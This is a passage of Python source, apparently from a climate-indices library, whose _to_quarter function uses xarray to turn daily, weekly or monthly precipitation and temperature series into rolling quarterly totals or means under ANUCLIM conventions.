index = op(dataset.criteria.where(~all_nans, 0), dim=dim)
return lazy_indexing(dataset.output, index=index, dim=dim).where(~all_nans)
return ds.resample(time=freq).map(get_other_op)
def _to_quarter(
freq: str,
pr: Optional[xarray.DataArray] = None,
tas: Optional[xarray.DataArray] = None,
) -> xarray.DataArray:
"""Convert daily, weekly or monthly time series to quarterly time series according to ANUCLIM specifications."""
if freq.upper().startswith("D"):
if tas is not None:
tas = tg_mean(tas, freq="7D")
if pr is not None:
# Accumulate on a week
# Ensure units are back to a "rate" for rate2amount below
pr = convert_units_to(precip_accumulation(pr, freq="7D"), "mm")
pr.attrs["units"] = "mm/week"
freq = "W"
if freq.upper().startswith("W"):
window = 13
elif freq.upper().startswith("M"):
window = 3
else:
raise NotImplementedError(
f'Unknown input time frequency "{freq}": must be one of "D", "W" or "M".'
)
if tas is not None:
tas = ensure_chunk_size(tas, time=np.ceil(window / 2))
if pr is not None:
pr = ensure_chunk_size(pr, time=np.ceil(window / 2))
if pr is not None:
pram = rate2amount(pr)
out = pram.rolling(time=window, center=False).sum()
out.attrs = pr.attrs
out.attrs["units"] = pram.units
if tas is not None:
out = tas.rolling(time=window, center=False).mean(skipna=False)
out.attrs = tas.attrs
out = ensure_chunk_size(out, time=-1)
return out
| 2.4375 | 2 |